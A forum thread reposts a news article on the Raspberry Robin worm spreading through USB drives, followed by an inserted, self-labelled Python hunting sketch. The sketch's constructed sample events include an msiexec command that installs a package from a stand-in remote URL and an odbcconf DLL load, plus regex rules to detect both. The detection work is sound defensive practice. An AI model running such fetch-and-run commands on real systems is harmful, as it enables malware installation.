
Thread: Hundreds of Windows Networks Are Infected With Raspberry Robin Worm

  1. #1
    Teh One Who Knocks

    Hundreds of Windows Networks Are Infected With Raspberry Robin Worm

    By Matthew Humphries - PC Magazine




    Microsoft released a private threat intelligence advisory informing organizations that a worm called Raspberry Robin is infecting hundreds of Windows networks.

    As BleepingComputer reports, Raspberry Robin is being spread via infected USB devices. It requires a user to insert the USB device and click a malicious .LNK file. After that, the worm uses the Windows command prompt to launch an msiexec process and run a malicious file also present on the device.

    A connection is then established with a command and control server using a short URL, and if successful, a number of malicious DLLs are downloaded and installed. The legitimate Windows utility odbcconf.exe is then used to execute the DLLs while the worm repeatedly attempts to connect to Tor network nodes. At least some of the command and control servers being used are thought to be infected QNAP NAS devices.

    What's worrying is, whoever deployed Raspberry Robin so successfully has yet to take advantage of the infected Windows networks. The malware introduced by the worm is capable of bypassing Windows User Account Control (UAC) and has already proven it can use the utilities available to the OS. So while nobody currently knows the goal of Raspberry Robin, the control it imposes over a network means new malware could be downloaded and deployed very quickly.

    Microsoft has flagged Raspberry Robin as a high-risk campaign with good reason, and for now there doesn't seem to be any mitigation process beyond not plugging suspicious USB devices into a Windows network. Intelligence analyst Red Canary produced a detailed report about the worm back in May, which offers a deeper look into how it works.
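
Added example, not part of the thread or the quoted article: a minimal hunting sketch that flags the two process behaviours the article describes (msiexec started from the command prompt with a URL, and odbcconf.exe used to load a DLL) in process-creation telemetry. The event field names, rule names and sample events are constructed for illustration, and the command-line shapes matched (an http(s) URL passed to msiexec, odbcconf's `regsvr` action) are assumptions about how that behaviour appears in logs.

```python
import re

# Constructed process-creation events (e.g. exported from an EDR or Sysmon).
# All paths, hosts and URLs are made up for this example.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Installers\app.msi /qn"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\odbcconf.exe",
     "cmdline": r'odbcconf.exe /a {CONFIGSYSDSN "SQL Server" "DSN=test|SERVER=db01"}'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec /q /i "http://short.example:8080/abc"'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\SysWOW64\odbcconf.exe",
     "cmdline": r"ODBCCONF.exe /s /a {regsvr C:\Users\Public\sample.dll}"},
]

# Assumption: a remote package shows up as an http(s) URL on the command line.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Assumption: DLL execution via odbcconf uses its REGSVR action.
REGSVR_RE = re.compile(r"\{\s*regsvr\s+\"?[^\"}]+\.dll", re.IGNORECASE)


def image_name(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the names of the (hypothetical) rules this event matches."""
    image = image_name(event["image"])
    parent = image_name(event["parent"])
    cmdline = event["cmdline"]
    hits = []
    if image == "msiexec.exe" and URL_RE.search(cmdline):
        hits.append("msiexec-remote-package")
        if parent == "cmd.exe":
            hits.append("msiexec-from-cmd")
    if image == "odbcconf.exe" and REGSVR_RE.search(cmdline):
        hits.append("odbcconf-regsvr-dll")
    return hits


def scan(events):
    """Return (index, rule names) for every event that matches a rule."""
    results = [(i, classify(e)) for i, e in enumerate(events)]
    return [(i, hits) for i, hits in results if hits]


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, ", ".join(hits), "->", SAMPLE_EVENTS[index]["cmdline"])
```

The local MSI install and the DSN configuration call in the sample set do not match, which is the point of keying on the URL and the `regsvr` action rather than on the binary name alone.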

  2. #2
    PorkChopSandwiches
    Uh oh





